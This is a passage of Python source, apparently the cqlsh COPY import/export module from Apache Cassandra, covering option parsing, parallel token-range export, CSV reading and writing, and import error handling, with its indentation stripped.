"""
Read optional sections from a configuration file that was specified in the command options or from the default
cqlshrc configuration file if none was specified.
"""
config_file = opts.pop('configfile', '')
if not config_file:
config_file = self.config_file
if not os.path.isfile(config_file):
return opts
configs = configparser.RawConfigParser()
configs.readfp(open(config_file))
ret = dict()
config_sections = list(['copy', 'copy-%s' % (direction,),
'copy:%s.%s' % (self.ks, self.table),
'copy-%s:%s.%s' % (direction, self.ks, self.table)])
for section in config_sections:
if configs.has_section(section):
options = dict(configs.items(section))
self.printmsg("Reading options from %s:[%s]: %s" % (config_file, section, options))
ret.update(options)
# Update this last so the command line options take precedence over the configuration file options
if opts:
self.printmsg("Reading options from the command line: %s" % (opts,))
ret.update(opts)
if self.shell.debug: # this is important for testing, do not remove
self.printmsg("Using options: '%s'" % (ret,))
return ret
@staticmethod
def clean_options(opts):
"""
Convert all option values to valid string literals unless they are path names
"""
# Values are currently passed through unchanged; the path-name options
# ('errfile', 'ratefile') are normalized later with safe_normpath.
return dict(opts.items())
def parse_options(self, opts, direction):
"""
Parse options for import (COPY FROM) and export (COPY TO) operations.
Extract from opts csv and dialect options.
:return: 3 dictionaries: the csv options, the dialect options, any unrecognized options.
"""
shell = self.shell
opts = self.clean_options(self.maybe_read_config_file(opts, direction))
dialect_options = dict()
dialect_options['quotechar'] = ensure_str(opts.pop('quote', '"'))
dialect_options['escapechar'] = ensure_str(opts.pop('escape', '\\'))
dialect_options['delimiter'] = ensure_str(opts.pop('delimiter', ','))
if dialect_options['quotechar'] == dialect_options['escapechar']:
dialect_options['doublequote'] = True
del dialect_options['escapechar']
else:
dialect_options['doublequote'] = False
copy_options = dict()
copy_options['nullval'] = ensure_str(opts.pop('null', ''))
copy_options['header'] = bool(opts.pop('header', '').lower() == 'true')
copy_options['encoding'] = opts.pop('encoding', 'utf8')
copy_options['maxrequests'] = int(opts.pop('maxrequests', 6))
copy_options['pagesize'] = int(opts.pop('pagesize', 1000))
# by default the page timeout is 10 seconds per 1000 entries
# in the page size or 10 seconds if pagesize is smaller
copy_options['pagetimeout'] = int(opts.pop('pagetimeout', max(10, 10 * (copy_options['pagesize'] / 1000))))
copy_options['maxattempts'] = int(opts.pop('maxattempts', 5))
copy_options['dtformats'] = DateTimeFormat(opts.pop('datetimeformat', shell.display_timestamp_format),
shell.display_date_format, shell.display_nanotime_format,
milliseconds_only=True)
copy_options['floatprecision'] = int(opts.pop('floatprecision', '5'))
copy_options['doubleprecision'] = int(opts.pop('doubleprecision', '12'))
copy_options['chunksize'] = int(opts.pop('chunksize', 5000))
copy_options['ingestrate'] = int(opts.pop('ingestrate', 100000))
copy_options['maxbatchsize'] = int(opts.pop('maxbatchsize', 20))
copy_options['minbatchsize'] = int(opts.pop('minbatchsize', 10))
copy_options['reportfrequency'] = float(opts.pop('reportfrequency', 0.25))
copy_options['consistencylevel'] = shell.consistency_level
copy_options['decimalsep'] = opts.pop('decimalsep', '.')
copy_options['thousandssep'] = opts.pop('thousandssep', '')
copy_options['boolstyle'] = [ensure_str(s.strip()) for s in opts.pop('boolstyle', 'True, False').split(',')]
copy_options['numprocesses'] = int(opts.pop('numprocesses', self.get_num_processes(16)))
copy_options['begintoken'] = opts.pop('begintoken', '')
copy_options['endtoken'] = opts.pop('endtoken', '')
copy_options['maxrows'] = int(opts.pop('maxrows', '-1'))
copy_options['skiprows'] = int(opts.pop('skiprows', '0'))
copy_options['skipcols'] = opts.pop('skipcols', '')
copy_options['maxparseerrors'] = int(opts.pop('maxparseerrors', '-1'))
copy_options['maxinserterrors'] = int(opts.pop('maxinserterrors', '1000'))
copy_options['errfile'] = safe_normpath(opts.pop('errfile', 'import_%s_%s.err' % (self.ks, self.table,)))
copy_options['ratefile'] = safe_normpath(opts.pop('ratefile', ''))
copy_options['maxoutputsize'] = int(opts.pop('maxoutputsize', '-1'))
copy_options['preparedstatements'] = bool(opts.pop('preparedstatements', 'true').lower() == 'true')
copy_options['ttl'] = int(opts.pop('ttl', -1))
# Hidden properties, they do not appear in the documentation but can be set in config files
# or on the cmd line but w/o completion
copy_options['maxinflightmessages'] = int(opts.pop('maxinflightmessages', '512'))
copy_options['maxbackoffattempts'] = int(opts.pop('maxbackoffattempts', '12'))
copy_options['maxpendingchunks'] = int(opts.pop('maxpendingchunks', '24'))
# set requesttimeout to a value high enough so that maxbatchsize rows will never timeout if the server
# responds: here we set it to 1 sec per 10 rows but no less than 60 seconds
copy_options['requesttimeout'] = int(opts.pop('requesttimeout', max(60, 1 * copy_options['maxbatchsize'] / 10)))
# set childtimeout higher than requesttimeout so that child processes have a chance to report request timeouts
copy_options['childtimeout'] = int(opts.pop('childtimeout', copy_options['requesttimeout'] + 30))
self.check_options(copy_options)
return CopyOptions(copy=copy_options, dialect=dialect_options, unrecognized=opts)
@staticmethod
def check_options(copy_options):
"""
Check any options that require a sanity check beyond a simple type conversion and if required
raise a value error:
- boolean styles must be exactly 2, they must be different and they cannot be empty
"""
bool_styles = copy_options['boolstyle']
if len(bool_styles) != 2 or bool_styles[0] == bool_styles[1] or not bool_styles[0] or not bool_styles[1]:
raise ValueError("Invalid boolean styles %s" % copy_options['boolstyle'])
@staticmethod
def get_num_processes(cap):
"""
Pick a reasonable number of child processes. We need to leave at
least one core for the parent or feeder process.
"""
return max(1, min(cap, CopyTask.get_num_cores() - 1))
@staticmethod
def get_num_cores():
"""
Return the number of cores if available. If the test environment variable
is set, then return the number carried by this variable. This is to test single-core
machines more easily.
"""
try:
num_cores_for_testing = os.environ.get('CQLSH_COPY_TEST_NUM_CORES', '')
ret = int(num_cores_for_testing) if num_cores_for_testing else mp.cpu_count()
printdebugmsg("Detected %d core(s)" % (ret,))
return ret
except NotImplementedError:
printdebugmsg("Failed to detect number of cores, returning 1")
return 1
@staticmethod
def describe_interval(seconds):
desc = []
for length, unit in ((86400, 'day'), (3600, 'hour'), (60, 'minute')):
num = int(seconds) // length  # floor division so fractional units are not counted
if num > 0:
desc.append('%d %s' % (num, unit))
if num > 1:
desc[-1] += 's'
seconds %= length
words = '%.03f seconds' % seconds
if len(desc) > 1:
words = ', '.join(desc) + ', and ' + words
elif len(desc) == 1:
words = desc[0] + ' and ' + words
return words
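# Worked example (illustration only), assuming the floor division above:
# describe_interval(3725.5) finds 1 hour (seconds becomes 125.5), then
# 2 minutes (seconds becomes 5.5), and returns
# '1 hour, 2 minutes, and 5.500 seconds'.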
@staticmethod
def get_columns(shell, ks, table, columns):
"""
Return all columns if none were specified or only the columns specified.
Possible enhancement: introduce a regex like syntax (^) to allow users
to specify all columns except a few.
"""
return shell.get_column_names(ks, table) if not columns else columns
def close(self):
self.stop_processes()
self.inmsg.close()
self.outmsg.close()
def num_live_processes(self):
return sum(1 for p in self.processes if p.is_alive())
@staticmethod
def get_pid():
return os.getpid() if hasattr(os, 'getpid') else None
@staticmethod
def trace_process(pid):
if pid and STRACE_ON:
os.system("strace -vvvv -c -o strace.{pid}.out -e trace=all -p {pid}&".format(pid=pid))
def start_processes(self):
for i, process in enumerate(self.processes):
process.start()
self.trace_process(process.pid)
self.trace_process(self.get_pid())
def stop_processes(self):
for process in self.processes:
process.terminate()
def make_params(self):
"""
Return a dictionary of parameters to be used by the worker processes.
On platforms using 'spawn' as the default multiprocessing start method,
this dictionary must be picklable.
"""
shell = self.shell
return dict(ks=self.ks,
table=self.table,
local_dc=self.host.datacenter,
columns=self.columns,
options=self.options,
connect_timeout=shell.conn.connect_timeout,
hostname=self.host.address,
port=shell.port,
ssl=shell.ssl,
auth_provider=shell.auth_provider,
cql_version=shell.conn.cql_version,
config_file=self.config_file,
protocol_version=self.protocol_version,
debug=shell.debug,
coverage=shell.coverage,
coveragerc_path=shell.coveragerc_path
)
def validate_columns(self):
shell = self.shell
if not self.columns:
shell.printerr("No column specified")
return False
for c in self.columns:
if c not in self.table_meta.columns:
shell.printerr('Invalid column name %s' % (c,))
return False
return True
def update_params(self, params, i):
"""
Add the communication pipes to the parameters to be passed to the worker process:
inpipe is the message pipe flowing from parent to child (an outpipe from the parent's point
of view) and, vice versa, outpipe is the message pipe flowing from child to parent (an inpipe
from the parent's point of view), hence the two are swapped below.
"""
params['inpipe'] = self.outmsg.pipes[i]
params['outpipe'] = self.inmsg.pipes[i]
return params
class ExportWriter(object):
"""
A class that writes to one or more csv files, or STDOUT
"""
def __init__(self, fname, shell, columns, options):
self.fname = fname
self.shell = shell
self.columns = columns
self.options = options
self.header = options.copy['header']
self.max_output_size = int(options.copy['maxoutputsize'])
self.current_dest = None
self.num_files = 0
if self.max_output_size > 0:
if fname is not None:
self.write = self._write_with_split
self.num_written = 0
else:
shell.printerr("WARNING: maxoutputsize {} ignored when writing to STDOUT".format(self.max_output_size))
self.write = self._write_without_split
else:
self.write = self._write_without_split
def open(self):
self.current_dest = self._get_dest(self.fname)
if self.current_dest is None:
return False
if self.header:
writer = csv.writer(self.current_dest.output, **self.options.dialect)
writer.writerow([ensure_str(c) for c in self.columns])
return True
def close(self):
self._close_current_dest()
def _next_dest(self):
self._close_current_dest()
self.current_dest = self._get_dest(self.fname + '.%d' % (self.num_files,))
def _get_dest(self, source_name):
"""
Open the output file if any or else use stdout. Return a namedtuple
containing the output and a boolean indicating whether the output should be closed.
"""
CsvDest = namedtuple('CsvDest', 'output close')
if self.fname is None:
return CsvDest(output=sys.stdout, close=False)
else:
try:
ret = CsvDest(output=open(source_name, 'w'), close=True)
self.num_files += 1
return ret
except IOError as e:
self.shell.printerr("Can't open %r for writing: %s" % (source_name, e))
return None
def _close_current_dest(self):
if self.current_dest and self.current_dest.close:
self.current_dest.output.close()
self.current_dest = None
def _write_without_split(self, data, _):
"""
Write the data to the current destination output.
"""
self.current_dest.output.write(data)
def _write_with_split(self, data, num):
"""
Write the data to the current destination output if we still
haven't reached the maximum number of rows. Otherwise split
the rows between the current destination and the next.
"""
if (self.num_written + num) > self.max_output_size:
num_remaining = self.max_output_size - self.num_written
last_switch = 0
for i, row in enumerate([_f for _f in data.split(os.linesep) if _f]):
if i == num_remaining:
self._next_dest()
last_switch = i
num_remaining += self.max_output_size
self.current_dest.output.write(row + '\n')
self.num_written = num - last_switch
else:
self.num_written += num
self.current_dest.output.write(data)
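# Worked example (illustration only) of the splitting logic above: with
# max_output_size=3 and 2 rows already written, a call with 4 rows writes one row
# to the current file, switches to '<fname>.1', writes the remaining 3 rows there,
# and leaves num_written at 3 for the new file.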
class ExportTask(CopyTask):
"""
A class that exports data to .csv by instantiating one or more processes that work in parallel (ExportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'to')
options = self.options
self.begin_token = int(options.copy['begintoken']) if options.copy['begintoken'] else None
self.end_token = int(options.copy['endtoken']) if options.copy['endtoken'] else None
self.writer = ExportWriter(fname, shell, columns, options)
def run(self):
"""
Initiates the export by starting the worker processes.
Then hand over control to export_records.
"""
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY TO options: %s' % ', '.join(list(self.options.unrecognized.keys())))
return
if not self.validate_columns():
return 0
ranges = self.get_ranges()
if not ranges:
return 0
if not self.writer.open():
return 0
columns = "[" + ", ".join(self.columns) + "]"
self.printmsg("\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
params = self.make_params()
for i in range(self.num_processes):
self.processes.append(ExportProcess(self.update_params(params, i)))
self.start_processes()
try:
self.export_records(ranges)
finally:
self.close()
def close(self):
CopyTask.close(self)
self.writer.close()
def get_ranges(self):
"""
return a queue of tuples, where the first tuple entry is a token range (from, to]
and the second entry is a list of hosts that own that range. Each host is responsible
for all the tokens in the range (from, to].
The ring information comes from the driver metadata token map, which is built by
querying System.PEERS.
We only consider replicas that are in the local datacenter. If there are no local replicas
we use the cqlsh session host.
"""
shell = self.shell
hostname = self.host.address
local_dc = self.host.datacenter
ranges = dict()
min_token = self.get_min_token()
begin_token = self.begin_token
end_token = self.end_token
def make_range(prev, curr):
"""
Return the intersection of (prev, curr) and (begin_token, end_token),
return None if the intersection is empty
"""
ret = (prev, curr)
if begin_token:
if curr < begin_token:
return None
elif (prev is None) or (prev < begin_token):
ret = (begin_token, curr)
if end_token:
if (ret[0] is not None) and (ret[0] > end_token):
return None
elif (curr is not None) and (curr > end_token):
ret = (ret[0], end_token)
return ret
def make_range_data(replicas=None):
hosts = []
if replicas:
for r in replicas:
if r.is_up is not False and r.datacenter == local_dc:
hosts.append(r.address)
if not hosts:
hosts.append(hostname) # fallback to default host if no replicas in current dc
return {'hosts': tuple(hosts), 'attempts': 0, 'rows': 0, 'workerno': -1}
if begin_token and begin_token < min_token:
shell.printerr('Begin token %d must be bigger or equal to min token %d' % (begin_token, min_token))
return ranges
if begin_token and end_token and begin_token > end_token:
shell.printerr('Begin token %d must be smaller than end token %d' % (begin_token, end_token))
return ranges
if shell.conn.metadata.token_map is None or min_token is None:
ranges[(begin_token, end_token)] = make_range_data()
return ranges
ring = list(shell.get_ring(self.ks).items())
ring.sort()
if not ring:
# If the ring is empty we get the entire ring from the host we are currently connected to
ranges[(begin_token, end_token)] = make_range_data()
elif len(ring) == 1:
# If there is only one token we get the entire ring from the replicas for that token
ranges[(begin_token, end_token)] = make_range_data(ring[0][1])
else:
# else we loop on the ring
first_range_data = None
previous = None
for token, replicas in ring:
if not first_range_data:
first_range_data = make_range_data(replicas) # we use it at the end when wrapping around
if token.value == min_token:
continue # avoids looping entire ring
current_range = make_range(previous, token.value)
if not current_range:
continue
ranges[current_range] = make_range_data(replicas)
previous = token.value
# For the last ring interval we query the same replicas that hold the first token in the ring
if previous is not None and (not end_token or previous < end_token):
ranges[(previous, end_token)] = first_range_data
elif previous is None and (not end_token or previous < end_token):
previous = begin_token if begin_token else min_token
ranges[(previous, end_token)] = first_range_data
if not ranges:
shell.printerr('Found no ranges to query, check begin and end tokens: %s - %s' % (begin_token, end_token))
return ranges
def get_min_token(self):
"""
:return the minimum token, which depends on the partitioner.
For partitioners that do not support tokens we return None, in
this case we will not work in parallel; we'll just send all requests
to the cqlsh session host.
"""
partitioner = self.shell.conn.metadata.partitioner
if partitioner.endswith('RandomPartitioner'):
return -1
elif partitioner.endswith('Murmur3Partitioner'):
return -(2 ** 63) # Long.MIN_VALUE in Java
else:
return None
def send_work(self, ranges, tokens_to_send):
prev_worker_no = ranges[tokens_to_send[0]]['workerno']
i = prev_worker_no + 1 if -1 <= prev_worker_no < (self.num_processes - 1) else 0
for token_range in tokens_to_send:
ranges[token_range]['workerno'] = i
self.outmsg.channels[i].send((token_range, ranges[token_range]))
ranges[token_range]['attempts'] += 1
i = i + 1 if i < self.num_processes - 1 else 0
def export_records(self, ranges):
"""
Send records to child processes and monitor them by collecting their results
or any errors. We terminate when we have processed all the ranges or when one child
process has died (since in this case we will never get any ACK for the ranges
processed by it and at the moment we don't keep track of which ranges a
process is handling).
"""
shell = self.shell
processes = self.processes
meter = RateMeter(log_fcn=self.printmsg,
update_interval=self.options.copy['reportfrequency'],
log_file=self.options.copy['ratefile'])
total_requests = len(ranges)
max_attempts = self.options.copy['maxattempts']
self.send_work(ranges, list(ranges.keys()))
num_processes = len(processes)
succeeded = 0
failed = 0
while (failed + succeeded) < total_requests and self.num_live_processes() == num_processes:
for token_range, result in self.inmsg.recv(timeout=0.1):
if token_range is None and result is None: # a request has finished
succeeded += 1
elif isinstance(result, Exception): # an error occurred
# This token_range failed, retry up to max_attempts if no rows received yet,
# If rows were already received we'd risk duplicating data.
# Note that there is still a slight risk of duplicating data, even if we have
# an error with no rows received yet, it's just less likely. To avoid retrying on
# all timeouts would however mean we could risk not exporting some rows.
if ranges[token_range]['attempts'] < max_attempts and ranges[token_range]['rows'] == 0:
shell.printerr('Error for %s: %s (will try again later attempt %d of %d)'
% (token_range, result, ranges[token_range]['attempts'], max_attempts))
self.send_work(ranges, [token_range])
else:
shell.printerr('Error for %s: %s (permanently given up after %d rows and %d attempts)'
% (token_range, result, ranges[token_range]['rows'],
ranges[token_range]['attempts']))
failed += 1
else: # partial result received
data, num = result
self.writer.write(data, num)
meter.increment(n=num)
ranges[token_range]['rows'] += num
if self.num_live_processes() < len(processes):
for process in processes:
if not process.is_alive():
shell.printerr('Child process %d died with exit code %d' % (process.pid, process.exitcode))
if succeeded < total_requests:
shell.printerr('Exported %d ranges out of %d total ranges, some records might be missing'
% (succeeded, total_requests))
self.printmsg("\n%d rows exported to %d files in %s." %
(meter.get_total_records(),
self.writer.num_files,
self.describe_interval(time.time() - self.time_start)))
class FilesReader(object):
"""
A wrapper around a csv reader to keep track of when we have
exhausted reading input files. We are passed a comma separated
list of paths, where each path is a valid glob expression.
We generate a source generator and we read each source one
by one.
"""
def __init__(self, fname, options):
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.fname = fname
self.sources = None # must be created later due to pickle problems on Windows
self.num_sources = 0
self.current_source = None
self.num_read = 0
def get_source(self, paths):
"""
Return a source generator. Each source is a named tuple
wrapping the source input, file name and a boolean indicating
if it requires closing.
"""
def make_source(fname):
try:
return open(fname, 'r')
except IOError as e:
raise IOError("Can't open %r for reading: %s" % (fname, e))
for path in paths.split(','):
path = path.strip()
if os.path.isfile(path):
yield make_source(path)
else:
result = glob.glob(path)
if len(result) == 0:
raise IOError("Can't open %r for reading: no matching file found" % (path,))
for f in result:
yield (make_source(f))
def start(self):
self.sources = self.get_source(self.fname)
self.next_source()
@property
def exhausted(self):
return not self.current_source
def next_source(self):
"""
Close the current source, if any, and open the next one. Return true
if there is another source, false otherwise.
"""
self.close_current_source()
while self.current_source is None:
try:
self.current_source = next(self.sources)
if self.current_source:
self.num_sources += 1
except StopIteration:
return False
if self.header:
next(self.current_source)
return True
def close_current_source(self):
if not self.current_source:
return
self.current_source.close()
self.current_source = None
def close(self):
self.close_current_source()
def read_rows(self, max_rows):
if not self.current_source:
return []
rows = []
for i in range(min(max_rows, self.chunk_size)):
try:
row = next(self.current_source)
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.next_source()
break
if self.num_read > self.skip_rows:
rows.append(row)
except StopIteration:
self.next_source()
break
return [_f for _f in rows if _f]
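# A minimal sketch (not part of the original module) of how FilesReader.get_source() expands the
# comma-separated path list: each entry is either an existing file or a glob expression, and each
# matching file becomes one source. The hypothetical helper below only resolves file names, it
# does not open them.
def _example_expand_paths(paths):
    import glob
    import os
    names = []
    for path in paths.split(','):
        path = path.strip()
        if os.path.isfile(path):
            names.append(path)
        else:
            names.extend(glob.glob(path))
    return names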
class PipeReader(object):
"""
A class for reading rows received on a pipe; it is used for reading input from STDIN
"""
def __init__(self, inpipe, options):
self.inpipe = inpipe
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.num_read = 0
self.exhausted = False
self.num_sources = 1
def start(self):
pass
def read_rows(self, max_rows):
rows = []
for i in range(min(max_rows, self.chunk_size)):
row = self.inpipe.recv()
if row is None:
self.exhausted = True
break
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.exhausted = True
break # max rows exceeded
if self.header or self.num_read < self.skip_rows:
self.header = False # skip header or initial skip_rows rows
continue
rows.append(row)
return rows
class ImportProcessResult(object):
"""
An object sent from ImportProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, imported=0):
self.imported = imported
class FeedingProcessResult(object):
"""
An object sent from FeedingProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, sent, reader):
self.sent = sent
self.num_sources = reader.num_sources
self.skip_rows = reader.skip_rows
class ImportTaskError(object):
"""
An object sent from child processes (feeder or workers) to the parent import task to indicate an error.
"""
def __init__(self, name, msg, rows=None, attempts=1, final=True):
self.name = name
self.msg = msg
self.rows = rows if rows else []
self.attempts = attempts
self.final = final
def is_parse_error(self):
"""
We treat read and parse errors as unrecoverable, and we keep separate global counters for giving up when
a maximum has been reached. Value and type errors are considered parse errors as well, since they
are typically non-recoverable.
"""
name = self.name
return name.startswith('ValueError') or name.startswith('TypeError') or \
name.startswith('ParseError') or name.startswith('IndexError') or name.startswith('ReadError')
class ImportErrorHandler(object):
"""
A class for managing import errors
"""
def __init__(self, task):
self.shell = task.shell
self.options = task.options
self.max_attempts = self.options.copy['maxattempts']
self.max_parse_errors = self.options.copy['maxparseerrors']
self.max_insert_errors = self.options.copy['maxinserterrors']
self.err_file = self.options.copy['errfile']
self.parse_errors = 0
self.insert_errors = 0
self.num_rows_failed = 0
if os.path.isfile(self.err_file):
now = datetime.datetime.now()
old_err_file = self.err_file + now.strftime('.%Y%m%d_%H%M%S')
printdebugmsg("Renaming existing %s to %s\n" % (self.err_file, old_err_file))
os.rename(self.err_file, old_err_file)
def max_exceeded(self):
if self.insert_errors > self.max_insert_errors >= 0:
self.shell.printerr("Exceeded maximum number of insert errors %d" % self.max_insert_errors)
return True
if self.parse_errors > self.max_parse_errors >= 0:
self.shell.printerr("Exceeded maximum number of parse errors %d" % self.max_parse_errors)
return True
return False
def add_failed_rows(self, rows):
self.num_rows_failed += len(rows)
with open(self.err_file, "a") as f:
writer = csv.writer(f, **self.options.dialect)
for row in rows:
writer.writerow(row)
def handle_error(self, err):
"""
Handle an error by printing the appropriate error message and incrementing the correct counter.
"""
shell = self.shell
if err.is_parse_error():
self.parse_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up without retries"
% (len(err.rows), err.name, err.msg))
else:
if not err.final:
shell.printerr("Failed to import %d rows: %s - %s, will retry later, attempt %d of %d"
% (len(err.rows), err.name, err.msg, err.attempts, self.max_attempts))
else:
self.insert_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up after %d attempts"
% (len(err.rows), err.name, err.msg, err.attempts))
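# A minimal sketch (not part of the original module) of the error-file rotation performed in
# ImportErrorHandler.__init__: an existing error file is renamed by appending a timestamp suffix
# so that a new COPY FROM run starts with a fresh file. The hypothetical helper below only
# computes the rotated name; it does not rename anything.
def _example_rotated_err_file_name(err_file, now=None):
    import datetime
    now = now or datetime.datetime.now()
    return err_file + now.strftime('.%Y%m%d_%H%M%S')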
class ImportTask(CopyTask):
"""
A class to import data from .csv by instantiating one or more processes
that work in parallel (ImportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'from')
options = self.options
self.skip_columns = [c.strip() for c in self.options.copy['skipcols'].split(',')]
self.valid_columns = [c for c in self.columns if c not in self.skip_columns]
self.receive_meter = RateMeter(log_fcn=self.printmsg,
update_interval=options.copy['reportfrequency'],
log_file=options.copy['ratefile'])
self.error_handler = ImportErrorHandler(self)
self.feeding_result = None
self.sent = 0
def make_params(self):
ret = CopyTask.make_params(self)
ret['skip_columns'] = self.skip_columns
ret['valid_columns'] = self.valid_columns
return ret
def validate_columns(self):
if not CopyTask.validate_columns(self):
return False
shell = self.shell
if not self.valid_columns:
shell.printerr("No valid column specified")
return False
for c in self.table_meta.primary_key:
if c.name not in self.valid_columns:
shell.printerr("Primary key column '%s' missing or skipped" % (c.name,))
return False
return True
def run(self):
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY FROM options: %s' % ', '.join(list(self.options.unrecognized.keys())))
return
if not self.validate_columns():
return 0
columns = "[" + ", ".join(self.valid_columns) + "]"
self.printmsg("\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
try:
params = self.make_params()
for i in range(self.num_processes - 1):
self.processes.append(ImportProcess(self.update_params(params, i)))
feeder = FeedingProcess(self.outmsg.pipes[-1], self.inmsg.pipes[-1],
self.outmsg.pipes[:-1], self.fname, self.options)
self.processes.append(feeder)
self.start_processes()
pr = profile_on() if PROFILE_ON else None
self.import_records()
if pr:
profile_off(pr, file_name='parent_profile_%d.txt' % (os.getpid(),))
except Exception as exc:
shell.printerr(str(exc))
if shell.debug:
traceback.print_exc()
return 0
finally:
self.close()
def send_stdin_rows(self):
"""
We need to pass stdin rows to the feeder process as it is not safe to pickle or share stdin
directly (in case of file the child process would close it). This is a very primitive support
for STDIN import in that we won't start reporting progress until STDIN is fully consumed. I
think this is reasonable.
"""
shell = self.shell
self.printmsg("[Use . on a line by itself to end input]")
for row in shell.use_stdin_reader(prompt='[copy] ', until=r'.'):
self.outmsg.channels[-1].send(row)
self.outmsg.channels[-1].send(None)
if shell.tty:
print()
def import_records(self):
"""
Keep receiving results until the feeder has reported how many rows it sent and that many
records have been received, aborting early if the error limits are exceeded, a child process
dies, or no new records arrive within the child timeout.
"""
if not self.fname:
self.send_stdin_rows()
child_timeout = self.options.copy['childtimeout']
last_recv_num_records = 0
last_recv_time = time.time()
while self.feeding_result is None or self.receive_meter.total_records < self.feeding_result.sent:
self.receive_results()
if self.feeding_result is not None:
if self.receive_meter.total_records != last_recv_num_records:
last_recv_num_records = self.receive_meter.total_records
last_recv_time = time.time()
elif (time.time() - last_recv_time) > child_timeout:
self.shell.printerr("No records inserted in {} seconds, aborting".format(child_timeout))
break
if self.error_handler.max_exceeded() or not self.all_processes_running():
break
if self.error_handler.num_rows_failed:
self.shell.printerr("Failed to process %d rows; failed rows written to %s" %
(self.error_handler.num_rows_failed,
self.error_handler.err_file))
if not self.all_processes_running():
self.shell.printerr("{} child process(es) died unexpectedly, aborting"
.format(self.num_processes - self.num_live_processes()))
else:
if self.error_handler.max_exceeded():
self.processes[-1].terminate() # kill the feeder
for i, _ in enumerate(self.processes):
if self.processes[i].is_alive():
self.outmsg.channels[i].send(None)
# allow time for worker processes to exit cleanly
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and self.num_live_processes() > 0:
time.sleep(0.1)
attempts -= 1
self.printmsg("\n%d rows imported from %d files in %s (%d skipped)." %
(self.receive_meter.get_total_records() - self.error_handler.num_rows_failed,
self.feeding_result.num_sources if self.feeding_result else 0,
self.describe_interval(time.time() - self.time_start),
self.feeding_result.skip_rows if self.feeding_result else 0))
def all_processes_running(self):
return self.num_live_processes() == len(self.processes)
def receive_results(self):
"""
Receive results either from the worker processes, which send the number of rows imported,
or from the feeder process, which sends the total number of rows sent once it has finished sending them.
"""
aggregate_result = ImportProcessResult()
try:
for result in self.inmsg.recv(timeout=0.1):
if isinstance(result, ImportProcessResult):
aggregate_result.imported += result.imported
elif isinstance(result, ImportTaskError):
self.error_handler.handle_error(result)
elif isinstance(result, FeedingProcessResult):
self.feeding_result = result
else:
raise ValueError("Unexpected result: %s" % (result,))
finally:
self.receive_meter.increment(aggregate_result.imported)
class FeedingProcess(mp.Process):
"""
A process that reads from import sources and sends chunks to worker processes.
"""
def __init__(self, inpipe, outpipe, worker_pipes, fname, options):
super(FeedingProcess, self).__init__(target=self.run)
self.inpipe = inpipe
self.outpipe = outpipe
self.worker_pipes = worker_pipes
self.inmsg = None # must be created after forking on Windows
self.outmsg = None # must be created after forking on Windows
self.worker_channels = None # must be created after forking on Windows
self.reader = FilesReader(fname, options) if fname else PipeReader(inpipe, options)
self.send_meter = RateMeter(log_fcn=None, update_interval=1)
self.ingest_rate = options.copy['ingestrate']
self.num_worker_processes = options.copy['numprocesses']
self.max_pending_chunks = options.copy['maxpendingchunks']
self.chunk_id = 0
def on_fork(self):
"""
Create the channels and release any parent connections after forking,
see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
self.worker_channels = [SendingChannel(p) for p in self.worker_pipes]
def run(self):
pr = profile_on() if PROFILE_ON else None
self.inner_run()
if pr:
profile_off(pr, file_name='feeder_profile_%d.txt' % (os.getpid(),))
def inner_run(self):
"""
Send one batch per worker process to the queue unless we have exceeded the ingest rate.
In the export case we queue everything and let the worker processes throttle using max_requests;
here we throttle using the ingest rate in the feeding process because of memory usage concerns.
When finished we send back to the parent process the total number of rows sent.
"""
self.on_fork()
reader = self.reader
try:
reader.start()
except IOError as exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message if hasattr(exc, 'message') else str(exc)))
channels = self.worker_channels
max_pending_chunks = self.max_pending_chunks
sent = 0
failed_attempts = 0
while not reader.exhausted:
channels_eligible = [c for c in channels if c.num_pending() < max_pending_chunks]
if not channels_eligible:
failed_attempts += 1
delay = randint(1, pow(2, failed_attempts))
printdebugmsg("All workers busy, sleeping for %d second(s)" % (delay,))
time.sleep(delay)
continue
elif failed_attempts > 0:
failed_attempts = 0
for ch in channels_eligible:
try:
max_rows = self.ingest_rate - self.send_meter.current_record
if max_rows <= 0:
self.send_meter.maybe_update(sleep=False)
continue
rows = reader.read_rows(max_rows)
if rows:
sent += self.send_chunk(ch, rows)
except Exception as exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message if hasattr(exc, 'message') else str(exc)))
if reader.exhausted:
break
# send back to the parent process the number of rows sent to the worker processes
self.outmsg.send(FeedingProcessResult(sent, reader))
# wait for poison pill (None)
self.inmsg.recv()
def send_chunk(self, ch, rows):
self.chunk_id += 1
num_rows = len(rows)
self.send_meter.increment(num_rows)
ch.send({'id': self.chunk_id, 'rows': rows, 'imported': 0, 'num_rows_sent': num_rows})
return num_rows
def close(self):
self.reader.close()
self.inmsg.close()
self.outmsg.close()
for ch in self.worker_channels:
ch.close()
class ChildProcess(mp.Process):
"""
A child worker process; this holds functionality common to ImportProcess and ExportProcess.
"""
def __init__(self, params, target):
super(ChildProcess, self).__init__(target=target)
self.inpipe = params['inpipe']
self.outpipe = params['outpipe']
self.inmsg = None # must be initialized after fork on Windows
self.outmsg = None # must be initialized after fork on Windows
self.ks = params['ks']
self.table = params['table']
